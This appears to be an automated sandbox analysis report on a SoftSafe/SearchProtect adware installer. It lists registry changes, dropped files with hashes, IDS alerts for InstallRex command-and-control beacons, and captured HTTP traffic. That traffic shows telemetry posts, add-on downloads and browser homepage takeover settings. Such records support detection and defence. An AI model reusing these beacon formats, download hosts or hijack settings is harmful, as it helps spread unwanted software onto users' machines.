"SilentUninstall" = "c:\documents and settings\all users\application data\softsafe\updatesoftware\updatesoftware.exe /uninstall"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"DisplayName" = "UpdateSoftware"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"NoRepair" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"InstallDate" = "20130802"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 95 24 04 27 14 9F F1 15 0F 02 1A D1 03 90 0A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"_In" = "20140802"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"DisplayIcon" = "C:\Windows\System32\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"UninstallString" = "c:\documents and settings\all users\application data\softsafe\updatesoftware\updatesoftware.exe /uninstall"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3956077583]
"DisplayVersion" = "3.3.0.1309"
Dropped PE files
| MD5 | File path |
|---|---|
| af7ce801c8471c5cd19b366333c153c4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Tsu905D28F2.dll |
| 02c162fd7706e887624dfcc410979355 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshBF.exe |
| 7f6b1c9c1e9b1b936b8a6c44e7588063 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsoBA.tmp |
| 02c162fd7706e887624dfcc410979355 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsuC3.exe |
| 23912df27a61ea0463c5509ba6a97579 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\putfu.exe |
| 0b813086a3400aafa1639d08823fbd46 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\sp-downloader.exe |
| 9dfbb035592ea044a4b29977a3f272ff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\usetup.exe |
| d1f319803ffc36548f3a2a3078db5fe3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll |
| e717f6ce3a7429bfa6d7f3cf66737a4b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe |
| b4ef2fa4426becd8ef546258ceb206b7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll |
| 6fd673efd6e4d460318c4f9ee43367c8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spstub[1].exe |
| 23912df27a61ea0463c5509ba6a97579 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe |
| 7f6b1c9c1e9b1b936b8a6c44e7588063 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\SPSetup[1].exe |
| 9dfbb035592ea044a4b29977a3f272ff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe |
| 0b813086a3400aafa1639d08823fbd46 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sp-downloader[1].exe |
| d4d1cc69e363813c14f289694756aa1e | c:\Program Files\ProgramUpdater\Assistant.dll |
| 348bd6c1565bd5f85ed13b56d2401f05 | c:\Program Files\ProgramUpdater\AssistantSvc.dll |
| fe11b14440be254f685acbb7fd62a966 | c:\Program Files\SearchProtect\Main\bin\CltMngSvc.exe |
| 437467dfb9cf21c183acf3e67a9e424c | c:\Program Files\SearchProtect\Main\bin\SPTool.dll |
| aaec330e1fb52dae0d09a73d522e8c9a | c:\Program Files\SearchProtect\Main\bin\uninstall.exe |
| b5f8de75260f7113d5191270cb557da9 | c:\Program Files\SearchProtect\SearchProtect\bin\SPTool64.exe |
| 0321511cbfb7315afe0108fbd0b80df1 | c:\Program Files\SearchProtect\SearchProtect\bin\SPVC32.dll |
| 8898fee7a02e3d3bf63167d068af6ac3 | c:\Program Files\SearchProtect\SearchProtect\bin\SPVC32Loader.dll |
| 4b65a420b108f3418fe6d3cdb64a226e | c:\Program Files\SearchProtect\SearchProtect\bin\SPVC64.dll |
| 6c5c6ae63ee4d7e88eb846e36b06eace | c:\Program Files\SearchProtect\SearchProtect\bin\SPVC64Loader.dll |
| f179d39cdc9c25f28f0a2510fc96266c | c:\Program Files\SearchProtect\SearchProtect\bin\cltmng.exe |
| ffe156d694dd7583948cb96dcfac5a3d | c:\Program Files\SearchProtect\UI\bin\cltmngui.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: SoftSafe
Product Name: SoftSafe
Product Version: 1.0.0.1
Legal Copyright: Copyright (c) 2012 SoftSafe
Legal Trademarks:
Original Filename: TSULoader.exe
Internal Name: TSULoader
File Version: 2013.4.21.1505
File Description: Installer for SoftSafe
Comments: WinNT (x86) Unicode Lib Rel
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 7672 | 7680 | 4.5056 | b1ae6dcdc3a7ba319c6d5e0b1a2eadbc |
| .rdata | 12288 | 1794 | 2048 | 3.26018 | cd4f20f041a2da05dfe5974fe61bd4ec |
| .data | 16384 | 1040 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 20480 | 8288 | 8704 | 3.02754 | 7fb2e9f5274919825402377c03c83fed |
| .reloc | 32768 | 348 | 512 | 2.09579 | 938152484b33bca77bd622973abb524e |
| .tsustub | 36864 | 120955 | 121344 | 5.54288 | 9c583a14d4612420371a949372873fe7 |
| .tsuarch | 159744 | 144896 | 144896 | 5.54321 | 880ff51a584fe29f2de4fa39efe3d924 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 5772
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET MALWARE W32/InstallRex.Adware Initial CnC Beacon
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE W32/InstallRex.Adware Report CnC Beacon
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET USER_AGENTS Suspicious Win32 User Agent
ET MALWARE Adware.Win32/SProtector.A Client Checkin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.databssint.com
Content-Length: 1062
Connection: Keep-Alive
Cache-Control: no-cache
{"event_type":"install_completed","SP_ID":"SP02A809A1-AD66-49FC-9E31-72DC6687025A","SP_version":"2.16.10.61","OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)","OS_version":"5.1","browser":"InternetExplorer","browser_version":"6.0.2900.5512","carrier_type":"ctid","carrier_ID":"CT3309297","carrier_version":"","carrier_userid":"","carrier_UM":"","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","hp_takeover":"true","other_takeover":"true","environment":"","sequence_timestamp":"1406946115024","profile_number":"1","user_number":"1", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8", "download_length": 3172, "install_type": "install", "result": "success", "reason": "0","v_env_tests":{"10_ProcessesExists":"0","10_ModuleInjected":"0","10_FakeSPServiceParent":"0","12_ProcessesExists":"0","12_StatusKeyExists":"0"},"v_env_codes":{"10":"0","12":"0"},"channel_id": "", "brand": "SP" , "previous_brand":"", "brand_install_type":"cleanmachine","Experiment":"","Variant":""}
HTTP/1.1 202 Accepted
Date: Sat, 02 Aug 2014 07:20:02 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive
POST /?report_version=5& HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: TixDll
Host: r2.monitorbox1.info
Content-Length: 547
Cache-Control: no-cache
data=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
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Aug 2014 07:19:44 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}
GET /?step_id=4_2&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=* HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.installbox1.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Aug 2014 07:20:04 GMT
Content-Type: text/html
Content-Length: 9090
Connection: close
Content-Disposition: attachment; filename="4_2.txt"
[Installer]
ProductName="Setup"
ProductVersion="1.0"
ProductCode="34a09f32-9906-4515-943a-87795d0baa6d"
PublisherID="388"
SourceID="0"
PageID="0"
AffiliateID="1_exe"
InstallerID="932447404"
Locale="<Language>"
Date="2014/08/02"
Time="7:20:04"
ShowInTaskbar="1"
HideScreens="0"
RunOnce="1"
LogUrl=""
LogStarted=""
LogFinished=""
LogBeforeSendReport=""
LogAfterSendReport=""

[Server]
ID="3"
Location="DE"

[UserInfo]
CountryCode="US"
IPAddress="184.107.38.38"
WebBrowser="4"

[RndGen]
Percentage="9"

[Screen76]
Title="Setup"
Button1="Try Again"
Button2="Cancel"
Label1="We're sorry: the download link seems to be broken. Please visit the author's homepage for further information."
[Screen75]
Title="Setup"
Button1="Yes"
Button2="No"
Label1="Are you sure?"
[Select<<< skipped >>>
GET /spinstallersettings/2.16.10.61/test/ABTEST_SETTINGS_ID/carrierId/CT3309297 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-settings.spccint.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/json; charset=text/plain
Last-Modified: Sat, 02 Aug 2014 07:18:17 GMT
ETag: "a55e817ccf82b7815aa0fbb683e056ce"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 649
Cache-Control: private, max-age=900
Expires: Sat, 02 Aug 2014 07:34:39 GMT
Date: Sat, 02 Aug 2014 07:19:39 GMT
Connection: keep-alive
{"InstallerSettings":{"CHExtension_Id":null,"CHExtension_LandingPage":null,"CHExtension_Name":null,"DEFAULT_CMD":null,"DUM":"2","InstallSPPDriver":null,"IsAUAllowednoTB":"true","LOST_USERS":"false","PING":"false","SERVICE_LOST_USERS":null,"TbExternalAssetsEnable":"true","UNINSTALL_PING":"false"},"AbTestSettings":{"Experiment":"","Variant":"","TestParameter":""},"CarrierSettings":{"CHExtensionMode":"false","v_env":"true","v_env_10":"true","v_env_12":"false"},"signature":"fI88PfOLh/cwPkDn6hWVaZZz5NmGlTLB/IX tlldXGPz/A16uO6j6bRrMZ gxZol5x97RJDaVTQa7kkp48CVU4agw9/18mr b0KoBkbYs13i mPnJ xVcrlMWIryxcOvXr/CW0KNatxjsXax0OmD9Aw0SayyFJFEUpJYYEpp4hc="}
GET /?step_id=3&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=* HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.installbox1.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Aug 2014 07:19:24 GMT
Content-Type: text/html
Content-Length: 6822
Connection: close
Content-Disposition: attachment; filename="3.txt"
[Installer]
ProductName="Setup"
ProductVersion="1.0"
ProductCode="3ebb3d8c-05f4-40e3-9cbe-28ed5e1d3264"
PublisherID="388"
SourceID="0"
PageID="0"
AffiliateID="1_exe"
InstallerID="932447404"
Locale="<Language>"
Date="2014/08/02"
Time="7:19:24"
ShowInTaskbar="1"
HideScreens="0"
RunOnce="1"
LogUrl=""
LogStarted=""
LogFinished=""
LogBeforeSendReport=""
LogAfterSendReport=""

[Server]
ID="3"
Location="DE"

[UserInfo]
CountryCode="US"
IPAddress="184.107.38.38"
WebBrowser="4"

[RndGen]
Percentage="64"

[Screen75]
Title="Setup"
Button1="Yes"
Button2="No"
Label1="Are you sure?"
[Screen76]
Title="Setup"
Button1="Try Again"
Button2="Cancel"
Label1="We're sorry: the download link seems to be broken. Please visit the author's homepage for further information."
[Selec<<< skipped >>>
GET /images/general_logo.bmp HTTP/1.1
Accept: */*
Host: i1.installbox1.info
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Aug 2014 07:19:23 GMT
Content-Type: image/x-ms-bmp
Content-Length: 21616
Last-Modified: Wed, 30 Jul 2014 00:07:05 GMT
Connection: close
ETag: "53d83729-5470"
Accept-Ranges: bytes
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.databssint.com
Content-Length: 687
Connection: Keep-Alive
Cache-Control: no-cache
{"event_type":"Stub_Init", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8", "environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3309297 -platform=all -local=en-us -startpage=true -defaultsearch=true -sessionid=M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8 -downloadlength=688 -EXT_ISID=false", "download_length": "688", "carrier_ID": "CT3309297", "carrier_type": "ctid", "carrier_version": "DEFAULT", "brand": "SP", "EXT_ISID":"false","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","installer_version":"2.4.2.5", "OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)", "OS_version":"5.1"}
HTTP/1.1 202 Accepted
Date: Sat, 02 Aug 2014 07:19:31 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.databssint.com
Content-Length: 883
Connection: Keep-Alive
Cache-Control: no-cache
{"event_type":"Stub_DownloadComplete", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8", "environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3309297 -platform=all -local=en-us -startpage=true -defaultsearch=true -sessionid=M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8 -downloadlength=688 -EXT_ISID=false", "download_length": "688", "carrier_ID": "CT3309297", "carrier_type": "ctid", "carrier_version": "DEFAULT", "brand": "SP", "EXT_ISID":"false","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","installer_version":"2.4.2.5","result":"success","reason":"0" , "log":"10#6-0#", "OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)", "OS_version":"5.1", "Installer_download_time_sec":"4", "Installer_url":"hXXp://sp-storage.spccinta.com/Installer/2.16.10.61/SPSetup.exe", "ExtraData":""}
HTTP/1.1 202 Accepted
Date: Sat, 02 Aug 2014 07:19:35 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.databssint.com
Content-Length: 792
Connection: Keep-Alive
Cache-Control: no-cache
{"event_type":"Stub_Complete", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8", "environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3309297 -platform=all -local=en-us -startpage=true -defaultsearch=true -sessionid=M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8 -downloadlength=688 -EXT_ISID=false", "download_length": "688", "carrier_ID": "CT3309297", "carrier_type": "ctid", "carrier_version": "DEFAULT", "brand": "SP", "EXT_ISID":"false","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","installer_version":"2.4.2.5","result":"success","reason":"0" , "log":"10#6-0#8#9-0-0#", "OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)", "OS_version":"5.1", "Installer_time_sec":"27", "ExtraData":""}
HTTP/1.1 202 Accepted
Date: Sat, 02 Aug 2014 07:20:03 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive
POST / HTTP/1.1
Content-Type: application/json
Accept: */*
User-Agent: SearchProtect;2.16.10.61;Microsoft Windows XP;SP02A809A1-AD66-49FC-9E31-72DC6687025A
Host: sp-alive-msg.databssint.com
Content-Length: 435
Connection: Keep-Alive
Cache-Control: no-cache
{"SP_ID":"SP02A809A1-AD66-49FC-9E31-72DC6687025A","SP_version":"2.16.10.61","OS_name":"Microsoft Windows XP","OS_version":"5.1","install_date":"20140802","environment":"","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","Experiment":"","Variant":"","driver_enabled":"false","action_type":"alive","type":"","brand":"SP","browser":"InternetExplorer","browser_version":"6.0.2900.5512"}
HTTP/1.1 202 Accepted
Date: Sat, 02 Aug 2014 07:19:57 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive
GET /Installer/2.16.10.61/SPSetup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-storage.spccinta.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Sat, 02 Aug 2014 10:02:31 GMT
Accept-Ranges: bytes
ETag: "9f6bb1485a2ed847d63f1614f5d9b70f"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 6824512
Date: Sat, 02 Aug 2014 07:19:32 GMT
Connection: keep-alive
<<< skipped >>>
GET /download/CarrierId/CT3309297/CarrierVersion/DEFAULT/CarrierType/ctid/Brand/SP HTTP/1.1
Accept: application/sp-download-v2
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-download.spccint.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 02 Aug 2014 07:18:10 GMT
Content-Length: 70
"http:\/\/sp-storage.spccinta.com\/Installer\/2.16.10.61\/SPSetup.exe"
GET /?step_id=2&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=* HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.installbox1.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Aug 2014 07:19:23 GMT
Content-Type: text/html
Content-Length: 4416
Connection: close
Content-Disposition: attachment; filename="2.txt"
[Installer]
ProductName="Setup"
ProductVersion="1.0"
ProductCode="bdc46c37-a072-4680-a155-4eb1f5c7ee55"
PublisherID="388"
SourceID="0"
PageID="0"
AffiliateID="1_exe"
InstallerID="932447404"
Locale="<Language>"
Date="2014/08/02"
Time="7:19:23"
ShowInTaskbar="1"
HideScreens="0"
RunOnce="1"
LogUrl=""
LogStarted=""
LogFinished=""
LogBeforeSendReport=""
LogAfterSendReport=""

[Server]
ID="3"
Location="DE"

[UserInfo]
CountryCode="US"
IPAddress="184.107.38.38"
WebBrowser="4"

[RndGen]
Percentage="21"

[Screen76]
Title="Setup"
Button1="Try Again"
Button2="Cancel"
Label1="We're sorry: the download link seems to be broken. Please visit the author's homepage for further information."
[Screen75]
Title="Setup"
Button1="Yes"
Button2="No"
Label1="Are you sure?"
[Selec<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.databssint.com
Content-Length: 951
Connection: Keep-Alive
Cache-Control: no-cache
{"event_type":"install_start","SP_ID":"SP02A809A1-AD66-49FC-9E31-72DC6687025A","SP_version":"2.16.10.61","OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)","OS_version":"5.1","browser":"InternetExplorer","browser_version":"6.0.2900.5512","carrier_type":"ctid","carrier_ID":"CT3309297","carrier_version":"","carrier_userid":"","carrier_UM":"","machine_ID":"SYMSEKIOXZBUAJHS1WVTWMFHOKY3NXHGTN4I0LTE/5O9BOIYIVKIMF3CSRVRMX8UX35IMHZ46IKGV8D2XDOQXG","hp_takeover":"true","other_takeover":"true","environment":"","sequence_timestamp":"1406946097618","profile_number":"1","user_number":"1", "installation_session_id":"M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8", "download_length": 3172, "install_type": "install", "result": "SP_RESULT", "reason": "SP_FAIL_REASON","v_env_tests":"V_ENV_TESTS_ALIAS","v_env_codes":"V_ENV_CODES_ALIAS","channel_id": "", "brand": "SP" , "previous_brand":"", "brand_install_type":"","Experiment":"","Variant":""}
HTTP/1.1 202 Accepted
Date: Sat, 02 Aug 2014 07:19:45 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive
GET /UP/settings/?ctid=CT3309297&UM=&c=CA&DUM=2 HTTP/1.1
User-Agent: SearchProtect;2.16.10.61;Microsoft Windows XP;SP02A809A1-AD66-49FC-9E31-72DC6687025A
Accept: */*
Host: c.api.seccint.com
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 4227
Cache-Control: private, max-age=3600
Expires: Sat, 02 Aug 2014 08:19:58 GMT
Date: Sat, 02 Aug 2014 07:19:58 GMT
Connection: keep-alive
{"GeneralId":null,"Ctid":"CT3309297","ProviderId":2,"ProviderName":"Bing","UserIP":""%local server IP%"","UserLanguage":"en","ToolbarLanguage":"en","EntityLanguage":"en","CountryShortCode":"CA","IsUserRTL":false,"IsToolbarRTL":false,"IsEntityRTL":false,"ShowClientDialog":true,"HomePageUrl":"hXXp://VVV.trovi.com/?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=55&CUI=SB_CUI&UM=6&UP=UP_ID","IsCustomizedHomepage":false,"HomePageButtonUrl":"hXXp://VVV.trovi.com/?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=55&CUI=SB_CUI&UM=6&UP=UP_ID&SAT=HPB","UM":"","SearchDomain":"VVV.trovi.com","ToolbarSearchBox":{"History":{"IsEnabled":true,"Position":1,"MaxAmount":5,"Label":{"Text":"History"}},"Verticals":[{"Name":"SearchImages","SearchUrl":"hXXp://VVV.trovi.com/?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=67&SearchType=SearchImages&CUI=SB_CUI&UM=6&UP=UP_ID&q=UCM_SEARCH_TERM","EmptySearchUrl":"hXXp://VVV.trovi.com/?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=67&SearchType=SearchImages&CUI=SB_CUI&UM=6&UP=UP_ID"}],"EmptySearchUrl":"hXXp://VVV.trovi.com/?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=67&CUI=SB_CUI&UM=6&UP=UP_ID","SearchUrl":"hXXp://VVV.trovi.com/Results.aspx?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=67&CUI=SB_CUI&UM=6&UP=UP_ID&q=UCM_SEARCH_TERM","Suggest":{"SearchResultsUrl":"hXXp://VVV.trovi.com/Results.aspx?gd=&ctid=CT3309297&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=67&Sugg<<< skipped >>>
GET /sp-downloader.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: sp-storage.conduit-services.com
HTTP/1.1 200 OK
Last-Modified: Sat, 02 Aug 2014 10:18:02 GMT
Accept-Ranges: bytes
ETag: "32b94cf0ed04298eaab31147eadd7760"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 145928
Cache-Control: private, max-age=900
Expires: Sat, 02 Aug 2014 07:34:24 GMT
Date: Sat, 02 Aug 2014 07:19:24 GMT
Connection: keep-alive
<<< skipped >>>
GET /ip/?client=sp HTTP/1.1
User-Agent: SearchProtect;2.16.10.61;Microsoft Windows XP;SP02A809A1-AD66-49FC-9E31-72DC6687025A
Accept: */*
Host: sp-ip2location.spccint.com
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 167
Content-Type: application/json; charset=text/plain
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 02 Aug 2014 07:18:35 GMT
{"Location":{"City":"MONTREAL","Country":"CANADA","CountryCode":"CA","IP":""%local server IP%"","Latitude":45.50884,"Longitude":-73.58781,"Region":"QUEBEC"},"Language":"en"}
GET /addons/agup.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: i1.installbox1.info
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Aug 2014 07:20:24 GMT
Content-Type: application/octet-stream
Content-Length: 1082880
Last-Modified: Wed, 30 Jul 2014 00:07:01 GMT
Connection: close
ETag: "53d83725-108600"
Accept-Ranges: bytes
<<< skipped >>>
GET /addons/dfndr/180/tpq.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: i1.installbox1.info
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Aug 2014 07:20:04 GMT
Content-Type: application/octet-stream
Content-Length: 4983808
Last-Modified: Wed, 30 Jul 2014 00:07:02 GMT
Connection: close
ETag: "53d83726-4c0c00"
Accept-Ranges: bytes
<<< skipped >>>
GET /?step_id=4_3&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=* HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.installbox1.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Aug 2014 07:20:22 GMT
Content-Type: text/html
Content-Length: 6882
Connection: close
Content-Disposition: attachment; filename="4_3.txt"
[Installer]
ProductName="Setup"
ProductVersion="1.0"
ProductCode="de9b088d-4ead-41bf-ae28-defb4755c018"
PublisherID="388"
SourceID="0"
PageID="0"
AffiliateID="1_exe"
InstallerID="932447404"
Locale="<Language>"
Date="2014/08/02"
Time="7:20:22"
ShowInTaskbar="1"
HideScreens="0"
RunOnce="1"
LogUrl=""
LogStarted=""
LogFinished=""
LogBeforeSendReport=""
LogAfterSendReport=""

[Server]
ID="3"
Location="DE"

[UserInfo]
CountryCode="US"
IPAddress="184.107.38.38"
WebBrowser="4"

[RndGen]
Percentage="53"

[Screen76]
Title="Setup"
Button1="Try Again"
Button2="Cancel"
Label1="We're sorry: the download link seems to be broken. Please visit the author's homepage for further information."
[Screen75]
Title="Setup"
Button1="Yes"
Button2="No"
Label1="Are you sure?"
[Selec<<< skipped >>>
GET /?step_id=1&installer_id=932447404&publisher_id=388&source_id=0&page_id=0&affiliate_id=1_exe&country_code=US&locale=EN&browser_id=4&download_id=3886750425&external_id=0&session_id=3218678628&hardware_id=1508444704&installer_file_name=setup&uuid=* HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.installbox1.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 02 Aug 2014 07:19:22 GMT
Content-Type: text/html
Content-Length: 6810
Connection: close
